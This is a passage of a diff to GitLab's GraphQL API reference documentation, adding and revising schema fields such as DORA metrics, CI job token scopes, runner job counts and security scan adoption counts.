job scheduling. Value is `dag` if the job uses the `needs` keyword, and `stage` otherwise. | | <a id="cijobshortsha"></a>`shortSha` | [`String!`](#string) | Short SHA1 ID of the commit. | | <a id="cijobstage"></a>`stage` | [`CiStage`](#cistage) | Stage of the job. | | <a id="cijobstartedat"></a>`startedAt` | [`Time`](#time) | When the job was started. | @@ -7633,6 +7787,14 @@ Represents the total number of issues and their weights for a particular day. | <a id="cijobartifactdownloadpath"></a>`downloadPath` | [`String`](#string) | URL for downloading the artifact's file. | | <a id="cijobartifactfiletype"></a>`fileType` | [`JobArtifactFileType`](#jobartifactfiletype) | File type of the artifact. | +### `CiJobTokenScopeType` + +#### Fields + +| Name | Type | Description | +| ---- | ---- | ----------- | +| <a id="cijobtokenscopetypeprojects"></a>`projects` | [`ProjectConnection!`](#projectconnection) | Allow list of projects that can be accessed by CI Job tokens created by this project. (see [Connections](#connections)) | + ### `CiRunner` #### Fields @@ -7644,18 +7806,20 @@ Represents the total number of issues and their weights for a particular day. | <a id="cirunnercontactedat"></a>`contactedAt` | [`Time`](#time) | Last contact from the runner. | | <a id="cirunnerdescription"></a>`description` | [`String`](#string) | Description of the runner. | | <a id="cirunnerid"></a>`id` | [`CiRunnerID!`](#cirunnerid) | ID of the runner. | -| <a id="cirunneripaddress"></a>`ipAddress` | [`String!`](#string) | IP address of the runner. | +| <a id="cirunneripaddress"></a>`ipAddress` | [`String`](#string) | IP address of the runner. | +| <a id="cirunnerjobcount"></a>`jobCount` | [`Int`](#int) | Number of jobs processed by the runner (limited to 1000, plus one to indicate that more items exist). | | <a id="cirunnerlocked"></a>`locked` | [`Boolean`](#boolean) | Indicates the runner is locked. | | <a id="cirunnermaximumtimeout"></a>`maximumTimeout` | [`Int`](#int) | Maximum timeout (in seconds) for jobs processed by the runner. | | <a id="cirunnerprivateprojectsminutescostfactor"></a>`privateProjectsMinutesCostFactor` | [`Float`](#float) | Private projects' "minutes cost factor" associated with the runner (GitLab.com only). | +| <a id="cirunnerprojectcount"></a>`projectCount` | [`Int`](#int) | Number of projects that the runner is associated with. | | <a id="cirunnerpublicprojectsminutescostfactor"></a>`publicProjectsMinutesCostFactor` | [`Float`](#float) | Public projects' "minutes cost factor" associated with the runner (GitLab.com only). | -| <a id="cirunnerrevision"></a>`revision` | [`String!`](#string) | Revision of the runner. | +| <a id="cirunnerrevision"></a>`revision` | [`String`](#string) | Revision of the runner. | | <a id="cirunnerrununtagged"></a>`runUntagged` | [`Boolean!`](#boolean) | Indicates the runner is able to run untagged jobs. | | <a id="cirunnerrunnertype"></a>`runnerType` | [`CiRunnerType!`](#cirunnertype) | Type of the runner. | | <a id="cirunnershortsha"></a>`shortSha` | [`String`](#string) | First eight characters of the runner's token used to authenticate new job requests. Used as the runner's unique ID. | | <a id="cirunnerstatus"></a>`status` | [`CiRunnerStatus!`](#cirunnerstatus) | Status of the runner. | | <a id="cirunnertaglist"></a>`tagList` | [`[String!]`](#string) | Tags associated with the runner. | -| <a id="cirunnerversion"></a>`version` | [`String!`](#string) | Version of the runner. | +| <a id="cirunnerversion"></a>`version` | [`String`](#string) | Version of the runner. | ### `CiStage` @@ -7665,8 +7829,10 @@ Represents the total number of issues and their weights for a particular day. | ---- | ---- | ----------- | | <a id="cistagedetailedstatus"></a>`detailedStatus` | [`DetailedStatus`](#detailedstatus) | Detailed status of the stage. | | <a id="cistagegroups"></a>`groups` | [`CiGroupConnection`](#cigroupconnection) | Group of jobs for the stage. (see [Connections](#connections)) | +| <a id="cistageid"></a>`id` | [`ID!`](#id) | ID of the stage. | | <a id="cistagejobs"></a>`jobs` | [`CiJobConnection`](#cijobconnection) | Jobs for the stage. (see [Connections](#connections)) | | <a id="cistagename"></a>`name` | [`String`](#string) | Name of the stage. | +| <a id="cistagestatus"></a>`status` | [`String`](#string) | Status of the pipeline stage. | ### `CiTemplate` @@ -8328,6 +8494,7 @@ four standard [pagination arguments](#connection-pagination-arguments): | <a id="detailedstatusgroup"></a>`group` | [`String`](#string) | Group of the status. | | <a id="detailedstatushasdetails"></a>`hasDetails` | [`Boolean`](#boolean) | Indicates if the status has further details. | | <a id="detailedstatusicon"></a>`icon` | [`String`](#string) | Icon of the status. | +| <a id="detailedstatusid"></a>`id` | [`String!`](#string) | ID for a detailed status. | | <a id="detailedstatuslabel"></a>`label` | [`String`](#string) | Label of the status. | | <a id="detailedstatustext"></a>`text` | [`String`](#string) | Text of the status. | | <a id="detailedstatustooltip"></a>`tooltip` | [`String`](#string) | Tooltip associated with the status. | @@ -8373,6 +8540,9 @@ Snapshot. | Name | Type | Description | | ---- | ---- | ----------- | | <a id="devopsadoptionsnapshotcodeownersusedcount"></a>`codeOwnersUsedCount` | [`Int`](#int) | Total number of projects with existing CODEOWNERS file. | +| <a id="devopsadoptionsnapshotcoveragefuzzingenabledcount"></a>`coverageFuzzingEnabledCount` | [`Int`](#int) | Total number of projects with enabled coverage fuzzing. | +| <a id="devopsadoptionsnapshotdastenabledcount"></a>`dastEnabledCount` | [`Int`](#int) | Total number of projects with enabled DAST. | +| <a id="devopsadoptionsnapshotdependencyscanningenabledcount"></a>`dependencyScanningEnabledCount` | [`Int`](#int) | Total number of projects with enabled dependency scanning. | | <a id="devopsadoptionsnapshotdeploysucceeded"></a>`deploySucceeded` | [`Boolean!`](#boolean) | At least one deployment succeeded. | | <a id="devopsadoptionsnapshotendtime"></a>`endTime` | [`Time!`](#time) | The end time for the snapshot where the data points were collected. | | <a id="devopsadoptionsnapshotissueopened"></a>`issueOpened` | [`Boolean!`](#boolean) | At least one issue was opened. | @@ -8381,9 +8551,11 @@ Snapshot. | <a id="devopsadoptionsnapshotpipelinesucceeded"></a>`pipelineSucceeded` | [`Boolean!`](#boolean) | At least one pipeline succeeded. | | <a id="devopsadoptionsnapshotrecordedat"></a>`recordedAt` | [`Time!`](#time) | The time the snapshot was recorded. | | <a id="devopsadoptionsnapshotrunnerconfigured"></a>`runnerConfigured` | [`Boolean!`](#boolean) | At least one runner was used. | -| <a id="devopsadoptionsnapshotsecurityscansucceeded"></a>`securityScanSucceeded` | [`Boolean!`](#boolean) | At least one security scan succeeded. | +| <a id="devopsadoptionsnapshotsastenabledcount"></a>`sastEnabledCount` | [`Int`](#int) | Total number of projects with enabled SAST. | +| <a id="devopsadoptionsnapshotsecurityscansucceeded"></a>`securityScanSucceeded` **{warning-solid}** | [`Boolean!`](#boolean) | **Deprecated** in 14.1. Substituted with specific security metrics. Always false. | | <a id="devopsadoptionsnapshotstarttime"></a>`startTime` | [`Time!`](#time) | The start time for the snapshot where the data points were collected. | | <a id="devopsadoptionsnapshottotalprojectscount"></a>`totalProjectsCount` | [`Int`](#int) | Total number of projects. | +| <a id="devopsadoptionsnapshotvulnerabilitymanagementusedcount"></a>`vulnerabilityManagementUsedCount` | [`Int`](#int) | Total number of projects with vulnerability management used at least once. | ### `DiffPosition` @@ -8446,6 +8618,7 @@ Aggregated summary of changes. | ---- | ---- | ----------- | | <a id="discussioncreatedat"></a>`createdAt` | [`Time!`](#time) | Timestamp of the discussion's creation. | | <a id="discussionid"></a>`id` | [`DiscussionID!`](#discussionid) | ID of this discussion. | +| <a id="discussionnoteable"></a>`noteable` | [`NoteableType`](#noteabletype) | Object which the discussion belongs to. | | <a id="discussionnotes"></a>`notes` | [`NoteConnection!`](#noteconnection) | All notes in the discussion. (see [Connections](#connections)) | | <a id="discussionreplyid"></a>`replyId` | [`DiscussionID!`](#discussionid) | ID used to reply to this discussion. | | <a id="discussionresolvable"></a>`resolvable` | [`Boolean!`](#boolean) | Indicates if the object can be resolved. | @@ -8453,6 +8626,37 @@ Aggregated summary of changes. | <a id="discussionresolvedat"></a>`resolvedAt` | [`Time`](#time) | Timestamp of when the object was resolved. | | <a id="discussionresolvedby"></a>`resolvedBy` | [`UserCore`](#usercore) | User who resolved the object. | +### `Dora` + +All information related to DORA metrics. + +#### Fields with arguments + +##### `Dora.metrics` + +DORA metrics for the current group or project. + +Returns [`[DoraMetric!]`](#dorametric). + +###### Arguments + +| Name | Type | Description | +| ---- | ---- | ----------- | +| <a id="dorametricsenddate"></a>`endDate` | [`Date`](#date) | Date range to end at. Default is the current date. | +| <a id="dorametricsenvironmenttier"></a>`environmentTier` | [`DeploymentTier`](#deploymenttier) | The deployment tier of the environments to return. Defaults to `PRODUCTION`. | +| <a id="dorametricsinterval"></a>`interval` | [`DoraMetricBucketingInterval`](#dorametricbucketinginterval) | How the metric should be aggregrated. Defaults to `DAILY`. In the case of `ALL`, the `date` field in the response will be `null`. | +| <a id="dorametricsmetric"></a>`metric` | [`DoraMetricType!`](#dorametrictype) | The type of metric to return. | +| <a id="dorametricsstartdate"></a>`startDate` | [`Date`](#date) | Date range to start from. Default is 3 months ago. | + +### `DoraMetric` + +#### Fields + +| Name | Type | Description | +| ---- | ---- | ----------- | +| <a id="dorametricdate"></a>`date` | [`String`](#string) | Date of the data point. | +| <a id="dorametricvalue"></a>`value` | [`Int`](#int) | Value of the data point. | + ### `Environment` Describes where code is deployed for a project. @@ -8556,7 +8760,8 @@ four standard [pagination arguments](#connection-pagination-arguments): | <a id="epicancestorsenddate"></a>`endDate` **{warning-solid}** | [`Time`](#time) | **Deprecated** in 13.5. Use timeframe.end. | | <a id="epicancestorsiid"></a>`iid` | [`ID`](#id) | IID of the epic, e.g., "1". | | <a id="epicancestorsiidstartswith"></a>`iidStartsWith` | [`String`](#string) | Filter epics by IID for autocomplete. | -| <a id="epicancestorsiids"></a>`iids` | [`[ID!]`](#id) | List of IIDs of epics, e.g., [1, 2]. | +| <a id="epicancestorsiids"></a>`iids` | [`[ID!]`](#id) | List of IIDs of epics, e.g., `[1, 2]`. | +| <a id="epicancestorsin"></a>`in` | [`[IssuableSearchableField!]`](#issuablesearchablefield) | Specify the fields to perform the search in. Defaults to `[TITLE, DESCRIPTION]`. Requires the `search` argument. | | <a id="epicancestorsincludeancestorgroups"></a>`includeAncestorGroups` | [`Boolean`](#boolean) | Include epics from ancestor groups. | | <a id="epicancestorsincludedescendantgroups"></a>`includeDescendantGroups` | [`Boolean`](#boolean) | Include epics from descendant groups. | | <a id="epicancestorslabelname"></a>`labelName` | [`[String!]`](#string) | Filter epics by labels. | @@ -8588,7 +8793,8 @@ four standard [pagination arguments](#connection-pagination-arguments): | <a id="epicchildrenenddate"></a>`endDate` **{warning-solid}** | [`Time`](#time) | **Deprecated** in 13.5. Use timeframe.end. | | <a id="epicchildreniid"></a>`iid` | [`ID`](#id) | IID of the epic, e.g., "1". | | <a id="epicchildreniidstartswith"></a>`iidStartsWith` | [`String`](#string) | Filter epics by IID for autocomplete. | -| <a id="epicchildreniids"></a>`iids` | [`[ID!]`](#id) | List of IIDs of epics, e.g., [1, 2]. | +| <a id="epicchildreniids"></a>`iids` | [`[ID!]`](#id) | List of IIDs of epics, e.g., `[1, 2]`. | +| <a id="epicchildrenin"></a>`in` | [`[IssuableSearchableField!]`](#issuablesearchablefield) | Specify the fields to perform the search in. Defaults to `[TITLE, DESCRIPTION]`. Requires the `search` argument. | | <a id="epicchildrenincludeancestorgroups"></a>`includeAncestorGroups` | [`Boolean`](#boolean) | Include epics from ancestor groups. | | <a id="epicchildrenincludedescendantgroups"></a>`includeDescendantGroups` | [`Boolean`](#boolean) | Include epics from descendant groups. | | <a id="epicchildrenlabelname"></a>`labelName` | [`[String!]`](#string) | Filter epics by labels. | @@ -8714,6 +8920,7 @@ Relationship between an epic and an issue. | <a id="epicissueblocked"></a>`blocked` | [`Boolean!`](#boolean) | Indicates the issue is blocked. | | <a id="epicissueblockedbycount"></a>`blockedByCount` | [`Int`](#int) | Count of issues blocking this issue. | | <a id="epicissueblockedbyissues"></a>`blockedByIssues` | [`IssueConnection`](#issueconnection) | Issues blocking this issue. (see [Connections](#connections)) | +| <a id="epicissueblockingcount"></a>`blockingCount` | [`Int!`](#int) | Count of issues this issue is blocking. | | <a id="epicissueclosedat"></a>`closedAt` | [`Time`](#time) | Timestamp of when the issue was closed. | | <a id="epicissueconfidential"></a>`confidential` | [`Boolean!`](#boolean) | Indicates the issue is confidential. | | <a id="epicissuecreatenoteemail"></a>`createNoteEmail` | [`String`](#string) | User specific email address for the issue. | @@ -8741,6 +8948,7 @@ Relationship between an epic and an issue. | <a id="epicissuemovedto"></a>`movedTo` | [`Issue`](#issue) | Updated Issue after it got moved to another project. | | <a id="epicissuenotes"></a>`notes` | [`NoteConnection!`](#noteconnection) | All notes on this noteable. (see [Connections](#connections)) | | <a id="epicissueparticipants"></a>`participants` | [`UserCoreConnection`](#usercoreconnection) | List of participants in the issue. (see [Connections](#connections)) | +| <a id="epicissueprojectid"></a>`projectId` | [`Int!`](#int) | ID of the issue project. | | <a id="epicissuerelationpath"></a>`relationPath` | [`String`](#string) | URI path of the epic-issue relation. | | <a id="epicissuerelativeposition"></a>`relativePosition` | [`Int`](#int) | Relative position of the issue (used for positioning in epic tree and issue boards). | | <a id="epicissueseverity"></a>`severity` | [`IssuableSeverity`](#issuableseverity) | Severity level of the incident. | @@ -9063,9 +9271,10 @@ four standard [pagination arguments](#connection-pagination-arguments): | <a id="groupbillablememberscount"></a>`billableMembersCount` | [`Int`](#int) | The number of billable users in the group. | | <a id="groupcontainerrepositoriescount"></a>`containerRepositoriesCount` | [`Int!`](#int) | Number of container repositories in the group. | | <a id="groupcontainslockedprojects"></a>`containsLockedProjects` | [`Boolean!`](#boolean) | Includes at least one project where the repository size exceeds the limit. | -| <a id="groupcustomemoji"></a>`customEmoji` | [`CustomEmojiConnection`](#customemojiconnection) | Custom emoji within this namespace. Available only when feature flag `custom_emoji` is enabled. (see [Connections](#connections)) | +| <a id="groupcustomemoji"></a>`customEmoji` | [`CustomEmojiConnection`](#customemojiconnection) | Custom emoji within this namespace. Available only when feature flag `custom_emoji` is enabled. This flag is disabled by default, because the feature is experimental and is subject to change without notice. (see [Connections](#connections)) | | <a id="groupdescription"></a>`description` | [`String`](#string) | Description of the namespace. | | <a id="groupdescriptionhtml"></a>`descriptionHtml` | [`String`](#string) | The GitLab Flavored Markdown rendering of `description`. | +| <a id="groupdora"></a>`dora` | [`Dora`](#dora) | The group's DORA metrics. | | <a id="groupemailsdisabled"></a>`emailsDisabled` | [`Boolean`](#boolean) | Indicates if a group has email notifications disabled. | | <a id="groupepicboards"></a>`epicBoards` | [`EpicBoardConnection`](#epicboardconnection) | Find epic boards. (see [Connections](#connections)) | | <a id="groupepicsenabled"></a>`epicsEnabled` | [`Boolean`](#boolean) | Indicates if Epics are enabled for namespace. | @@ -9191,7 +9400,8 @@ Returns [`Epic`](#epic). | <a id="groupepicenddate"></a>`endDate` **{warning-solid}** | [`Time`](#time) | **Deprecated** in 13.5. Use timeframe.end. | | <a id="groupepiciid"></a>`iid` | [`ID`](#id) | IID of the epic, e.g., "1". | | <a id="groupepiciidstartswith"></a>`iidStartsWith` | [`String`](#string) | Filter epics by IID for autocomplete. | -| <a id="groupepiciids"></a>`iids` | [`[ID!]`](#id) | List of IIDs of epics, e.g., [1, 2]. | +| <a id="groupepiciids"></a>`iids` | [`[ID!]`](#id) | List of IIDs of epics, e.g., `[1, 2]`. | +| <a id="groupepicin"></a>`in` | [`[IssuableSearchableField!]`](#issuablesearchablefield) | Specify the fields to perform the search in. Defaults to `[TITLE, DESCRIPTION]`. Requires the `search` argument. | | <a id="groupepicincludeancestorgroups"></a>`includeAncestorGroups` | [`Boolean`](#boolean) | Include epics from ancestor groups. | | <a id="groupepicincludedescendantgroups"></a>`includeDescendantGroups` | [`Boolean`](#boolean) | Include epics from descendant groups. | | <a id="groupepiclabelname"></a>`labelName` | [`[String!]`](#string) | Filter epics by labels. | @@ -9235,7 +9445,8 @@ four standard [pagination arguments](#connection-pagination-arguments): | <a id="groupepicsenddate"></a>`endDate` **{warning-solid}** | [`Time`](#time) | **Deprecated** in 13.5. Use timeframe.end. | | <a id="groupepicsiid"></a>`iid` | [`ID`](#id) | IID of the epic, e.g., "1". | | <a id="groupepicsiidstartswith"></a>`iidStartsWith` | [`String`](#string) | Filter epics by IID for autocomplete. | -| <a id="groupepicsiids"></a>`iids` | [`[ID!]`](#id) | List of IIDs of epics, e.g., [1, 2]. | +| <a id="groupepicsiids"></a>`iids` | [`[ID!]`](#id) | List of IIDs of epics, e.g., `[1, 2]`. | +| <a id="groupepicsin"></a>`in` | [`[IssuableSearchableField!]`](#issuablesearchablefield) | Specify the fields to perform the search in. Defaults to `[TITLE, DESCRIPTION]`. Requires the `search` argument. | | <a id="groupepicsincludeancestorgroups"></a>`includeAncestorGroups` | [`Boolean`](#boolean) | Include epics from ancestor groups. | | <a id="groupepicsincludedescendantgroups"></a>`includeDescendantGroups` | [`Boolean`](#boolean) | Include epics from descendant groups. | | <a id="groupepicslabelname"></a>`labelName` | [`[String!]`](#string) | Filter epics by labels. | @@ -9289,7 +9500,7 @@ four standard [pagination arguments](#connection-pagination-arguments): | <a id="groupissuescreatedbefore"></a>`createdBefore` | [`Time`](#time) | Issues created before this date. | | <a id="groupissuesepicid"></a>`epicId` | [`String`](#string) | ID of an epic associated with the issues, "none" and "any" values are supported. | | <a id="groupissuesiid"></a>`iid` | [`String`](#string) | IID of the issue. For example, "1". | -| <a id="groupissuesiids"></a>`iids` | [`[String!]`](#string) | List of IIDs of issues. For example, ["1", "2"]. | +| <a id="groupissuesiids"></a>`iids` | [`[String!]`](#string) | List of IIDs of issues. For example, `["1", "2"]`. | | <a id="groupissuesincludesubgroups"></a>`includeSubgroups` | [`Boolean`](#boolean) | Include issues belonging to subgroups. | | <a id="groupissuesiterationid"></a>`iterationId` | [`[ID]`](#id) | List of iteration Global IDs applied to the issue. | | <a id="groupissuesiterationwildcardid"></a>`iterationWildcardId` | [`IterationWildcardId`](#iterationwildcardid) | Filter by iteration ID wildcard. | @@ -9428,6 +9639,7 @@ four standard [pagination arguments](#connection-pagination-arguments): | <a id="groupmilestonesincludeancestors"></a>`includeAncestors` | [`Boolean`](#boolean) | Include milestones from all parent groups. | | <a id="groupmilestonesincludedescendants"></a>`includeDescendants` | [`Boolean`](#boolean) | Include milestones from all subgroups and subprojects. | | <a id="groupmilestonessearchtitle"></a>`searchTitle` | [`String`](#string) | A search string for the title. | +| <a id="groupmilestonessort"></a>`sort` | [`MilestoneSort`](#milestonesort) | Sort milestones by this criteria. | | <a id="groupmilestonesstartdate"></a>`startDate` **{warning-solid}** | [`Time`](#time) | **Deprecated** in 13.5. Use timeframe.start. | | <a id="groupmilestonesstate"></a>`state` | [`MilestoneStateEnum`](#milestonestateenum) | Filter milestones by state. | | <a id="groupmilestonestimeframe"></a>`timeframe` | [`Timeframe`](#timeframe) | List items overlapping the given timeframe. | @@ -9763,6 +9975,7 @@ Returns [`VulnerabilitySeveritiesCount`](#vulnerabilityseveritiescount). | <a id="issueblocked"></a>`blocked` | [`Boolean!`](#boolean) | Indicates the issue is blocked. | | <a id="issueblockedbycount"></a>`blockedByCount` | [`Int`](#int) | Count of issues blocking this issue. | | <a id="issueblockedbyissues"></a>`blockedByIssues` | [`IssueConnection`](#issueconnection) | Issues blocking this issue. (see [Connections](#connections)) | +| <a id="issueblockingcount"></a>`blockingCount` | [`Int!`](#int) | Count of issues this issue is blocking. | | <a id="issueclosedat"></a>`closedAt` | [`Time`](#time) | Timestamp of when the issue was closed. | | <a id="issueconfidential"></a>`confidential` | [`Boolean!`](#boolean) | Indicates the issue is confidential. | | <a id="issuecreatenoteemail"></a>`createNoteEmail` | [`String`](#string) | User specific email address for the issue. | @@ -9789,6 +10002,7 @@ Returns [`VulnerabilitySeveritiesCount`](#vulnerabilityseveritiescount). | <a id="issuemovedto"></a>`movedTo` | [`Issue`](#issue) | Updated Issue after it got moved to another project. | | <a id="issuenotes"></a>`notes` | [`NoteConnection!`](#noteconnection) | All notes on this noteable. (see [Connections](#connections)) | | <a id="issueparticipants"></a>`participants` | [`UserCoreConnection`](#usercoreconnection) | List of participants in the issue. (see [Connections](#connections)) | +| <a id="issueprojectid"></a>`projectId` | [`Int!`](#int) | ID of the issue project. | | <a id="issuerelativeposition"></a>`relativePosition` | [`Int`](#int) | Relative position of the issue (used for positioning in epic tree and issue boards). | | <a id="issueseverity"></a>`severity` | [`IssuableSeverity`](#issuableseverity) | Severity level of the incident. | | <a id="issuesladueat"></a>`slaDueAt` | [`Time`](#time) | Timestamp of when the issue SLA expires. | @@ -10671,6 +10885,7 @@ Represents a milestone. | <a id="milestonecreatedat"></a>`createdAt` | [`Time!`](#time) | Timestamp of milestone creation. | | <a id="milestonedescription"></a>`description` | [`String`](#string) | Description of the milestone. | | <a id="milestoneduedate"></a>`dueDate` | [`Time`](#time) | Timestamp of the milestone due date. | +| <a id="milestoneexpired"></a>`expired` | [`Boolean!`](#boolean) | Expired state of the milestone (a milestone is expired when the due date is past the current date). Defaults to `false` when due date has not been set. | | <a id="milestonegroupmilestone"></a>`groupMilestone` | [`Boolean!`](#boolean) | Indicates if milestone is at group level. | | <a id="milestoneid"></a>`id` | [`ID!`](#id) | ID of the milestone. | | <a id="milestoneiid"></a>`iid` | [`ID!`](#id) | Internal ID of the milestone. | @@ -10771,7 +10986,9 @@ Represents the network policy. | Name | Type | Description | | ---- | ---- | ----------- | | <a id="networkpolicyenabled"></a>`enabled` | [`Boolean!`](#boolean) | Indicates whether this policy is enabled. | +| <a id="networkpolicyenvironments"></a>`environments` | [`EnvironmentConnection`](#environmentconnection) | Environments where this policy is applied. (see [Connections](#connections)) | | <a id="networkpolicyfromautodevops"></a>`fromAutoDevops` | [`Boolean!`](#boolean) | Indicates whether this policy is created from AutoDevops. | +| <a id="networkpolicykind"></a>`kind` | [`NetworkPolicyKind!`](#networkpolicykind) | Kind of the policy. | | <a id="networkpolicyname"></a>`name` | [`String!`](#string) | Name of the policy. | | <a id="networkpolicynamespace"></a>`namespace` | [`String!`](#string) | Namespace of the policy. | | <a id="networkpolicyupdatedat"></a>`updatedAt` | [`Time!`](#time) | Timestamp of when the policy YAML was last updated. | @@ -11020,6 +11237,7 @@ Represents a file or directory in the project repository that has been locked. | <a id="pipelinepath"></a>`path` | [`String`](#string) | Relative path to the pipeline's page. | | <a id="pipelineproject"></a>`project` | [`Project`](#project) | Project the pipeline belongs to. | | <a id="pipelinequeuedduration"></a>`queuedDuration` | [`Duration`](#duration) | How long the pipeline was queued before starting. | +| <a id="pipelineref"></a>`ref` | [`String`](#string) | Reference to the branch from which the pipeline was triggered. | | <a id="pipelineretryable"></a>`retryable` | [`Boolean!`](#boolean) | Specifies if a pipeline can be retried. | | <a id="pipelinesecurityreportsummary"></a>`securityReportSummary` | [`SecurityReportSummary`](#securityreportsummary) | Vulnerability and scanned resource counts for each security scanner of the pipeline. | | <a id="pipelinesha"></a>`sha` | [`String!`](#string) | SHA of the pipeline's commit. | @@ -11084,6 +11302,7 @@ four standard [pagination arguments](#connection-pagination-arguments): | <a id="pipelinesecurityreportfindingsreporttype"></a>`reportType` | [`[String!]`](#string) | Filter vulnerability findings by report type. | | <a id="pipelinesecurityreportfindingsscanner"></a>`scanner` | [`[String!]`](#string) | Filter vulnerability findings by Scanner.externalId. | | <a id="pipelinesecurityreportfindingsseverity"></a>`severity` | [`[String!]`](#string) | Filter vulnerability findings by severity. | +| <a id="pipelinesecurityreportfindingsstate"></a>`state` | [`[VulnerabilityState!]`](#vulnerabilitystate) | Filter vulnerability findings by state. | ##### `Pipeline.testSuite` @@ -11178,11 +11397,12 @@ Represents vulnerability finding of a security report on the pipeline. | <a id="projectautoclosereferencedissues"></a>`autocloseReferencedIssues` | [`Boolean`](#boolean) | Indicates if issues referenced by merge requests and commits within the default branch are closed automatically. | | <a id="projectavatarurl"></a>`avatarUrl` | [`String`](#string) | URL to avatar image file of the project. | | <a id="projectcicdsettings"></a>`ciCdSettings` | [`ProjectCiCdSetting`](#projectcicdsetting) | CI/CD settings for the project. | +| <a id="projectcijobtokenscope"></a>`ciJobTokenScope` | [`CiJobTokenScopeType`](#cijobtokenscopetype) | The CI Job Tokens scope of access. | | <a id="projectclusteragents"></a>`clusterAgents` | [`ClusterAgentConnection`](#clusteragentconnection) | Cluster agents associated with the project. (see [Connections](#connections)) | | <a id="projectcodecoveragesummary"></a>`codeCoverageSummary` | [`CodeCoverageSummary`](#codecoveragesummary) | Code coverage summary associated with the project. | | <a id="projectcomplianceframeworks"></a>`complianceFrameworks` | [`ComplianceFrameworkConnection`](#complianceframeworkconnection) | Compliance frameworks associated with the project. (see [Connections](#connections)) | | <a id="projectcontainerexpirationpolicy"></a>`containerExpirationPolicy` | [`ContainerExpirationPolicy`](#containerexpirationpolicy) | The container expiration policy of the project. | -| <a id="projectcontainerregistryenabled"></a>`containerRegistryEnabled` | [`Boolean`](#boolean) | Indicates if the project stores Docker container images in a container registry. | +| <a id="projectcontainerregistryenabled"></a>`containerRegistryEnabled` | [`Boolean`](#boolean) | Indicates if Container Registry is enabled for the current user. | | <a id="projectcontainerrepositoriescount"></a>`containerRepositoriesCount` | [`Int!`](#int) | Number of container repositories in the project. | | <a id="projectcreatedat"></a>`createdAt` | [`Time`](#time) | Timestamp of the project creation. | | <a id="projectdastprofiles"></a>`dastProfiles` | [`DastProfileConnection`](#dastprofileconnection) | DAST Profiles associated with the project. (see [Connections](#connections)) | @@ -11190,6 +11410,7 @@ Represents vulnerability finding of a security report on the pipeline. | <a id="projectdastsiteprofiles"></a>`dastSiteProfiles` | [`DastSiteProfileConnection`](#dastsiteprofileconnection) | DAST Site Profiles associated with the project. (see [Connections](#connections)) | | <a id="projectdescription"></a>`description` | [`String`](#string) | Short description of the project. | | <a id="projectdescriptionhtml"></a>`descriptionHtml` | [`String`](#string) | The GitLab Flavored Markdown rendering of `description`. | +| <a id="projectdora"></a>`dora` | [`Dora`](#dora) | The project's DORA metrics. | | <a id="projectforkscount"></a>`forksCount` | [`Int!`](#int) | Number of times the project has been forked. | | <a id="projectfullpath"></a>`fullPath` | [`ID!`](#id) | Full path of the project. | | <a id="projectgrafanaintegration"></a>`grafanaIntegration` | [`GrafanaIntegration`](#grafanaintegration) | Grafana integration details for the project. | @@ -11263,7 +11484,7 @@ Returns [`AlertManagementAlert`](#alertmanagementalert). | <a id="projectalertmanagementalertiid"></a>`iid` | [`String`](#string) | IID of the alert. For example, "1". | | <a id="projectalertmanagementalertsearch"></a>`search` | [`String`](#string) | Search query for title, description, service, or monitoring_tool. | | <a id="projectalertmanagementalertsort"></a>`sort` | [`AlertManagementAlertSort`](#alertmanagementalertsort) | Sort alerts by this criteria. | -| <a id="projectalertmanagementalertstatuses"></a>`statuses` | [`[AlertManagementStatus!]`](#alertmanagementstatus) | Alerts with the specified statues. For example, [TRIGGERED]. | +| <a id="projectalertmanagementalertstatuses"></a>`statuses` | [`[AlertManagementStatus!]`](#alertmanagementstatus) | Alerts with the specified statues. For example, `[TRIGGERED]`. | ##### `Project.alertManagementAlertStatusCounts` @@ -11297,7 +11518,7 @@ four standard [pagination arguments](#connection-pagination-arguments): | <a id="projectalertmanagementalertsiid"></a>`iid` | [`String`](#string) | IID of the alert. For example, "1". | | <a id="projectalertmanagementalertssearch"></a>`search` | [`String`](#string) | Search query for title, description, service, or monitoring_tool. | | <a id="projectalertmanagementalertssort"></a>`sort` | [`AlertManagementAlertSort`](#alertmanagementalertsort) | Sort alerts by this criteria. | -| <a id="projectalertmanagementalertsstatuses"></a>`statuses` | [`[AlertManagementStatus!]`](#alertmanagementstatus) | Alerts with the specified statues. For example, [TRIGGERED]. | +| <a id="projectalertmanagementalertsstatuses"></a>`statuses` | [`[AlertManagementStatus!]`](#alertmanagementstatus) | Alerts with the specified statues. For example, `[TRIGGERED]`. | ##### `Project.alertManagementHttpIntegrations` @@ -11381,7 +11602,7 @@ Returns [`CiTemplate`](#citemplate). | Name | Type | Description | | ---- | ---- | ----------- | -| <a id="projectcitemplatename"></a>`name` | [`String!`](#string) | Name of the CI/CD template to search for. | +| <a id="projectcitemplatename"></a>`name` | [`String!`](#string) | Name of the CI/CD template to search for. Template must be formatted as `Name.gitlab-ci.yml`. | ##### `Project.clusterAgent` @@ -11520,7 +11741,7 @@ Returns [`Issue`](#issue). | <a id="projectissuecreatedbefore"></a>`createdBefore` | [`Time`](#time) | Issues created before this date. | | <a id="projectissueepicid"></a>`epicId` | [`String`](#string) | ID of an epic associated with the issues, "none" and "any" values are supported. | | <a id="projectissueiid"></a>`iid` | [`String`](#string) | IID of the issue. For example, "1". | -| <a id="projectissueiids"></a>`iids` | [`[String!]`](#string) | List of IIDs of issues. For example, ["1", "2"]. | +| <a id="projectissueiids"></a>`iids` | [`[String!]`](#string) | List of IIDs of issues. For example, `["1", "2"]`. | | <a id="projectissueiterationid"></a>`iterationId` | [`[ID]`](#id) | List of iteration Global IDs applied to the issue. | | <a id="projectissueiterationwildcardid"></a>`iterationWildcardId` | [`IterationWildcardId`](#iterationwildcardid) | Filter by iteration ID wildcard. | | <a id="projectissuelabelname"></a>`labelName` | [`[String]`](#string) | Labels applied to this issue. | @@ -11553,7 +11774,7 @@ Returns [`IssueStatusCountsType`](#issuestatuscountstype). | <a id="projectissuestatuscountscreatedafter"></a>`createdAfter` | [`Time`](#time) | Issues created after this date. | | <a id="projectissuestatuscountscreatedbefore"></a>`createdBefore` | [`Time`](#time) | Issues created before this date. | | <a id="projectissuestatuscountsiid"></a>`iid` | [`String`](#string) | IID of the issue. For example, "1". | -| <a id="projectissuestatuscountsiids"></a>`iids` | [`[String!]`](#string) | List of IIDs of issues. For example, ["1", "2"]. | +| <a id="projectissuestatuscountsiids"></a>`iids` | [`[String!]`](#string) | List of IIDs of issues. For example, `["1", "2"]`. | | <a id="projectissuestatuscountslabelname"></a>`labelName` | [`[String]`](#string) | Labels applied to this issue. | | <a 